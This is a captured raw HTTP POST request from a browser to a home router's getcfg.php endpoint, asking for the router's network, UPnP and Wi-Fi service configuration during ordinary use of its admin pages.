POST /getcfg.php HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Origin: http://192.168.0.1
Connection: keep-alive
Referer: http://192.168.0.1/adv_network.php
Cookie: uid=RvRQQgL6lA

SERVICES=ICMP.WAN-1%2CICMP.WAN-2%2CPHYINF.WAN-1%2CMULTICAST%2CUPNP.LAN-1%2CUPNP.LAN-3%2CWIFI.PHYINF%2CDEVICE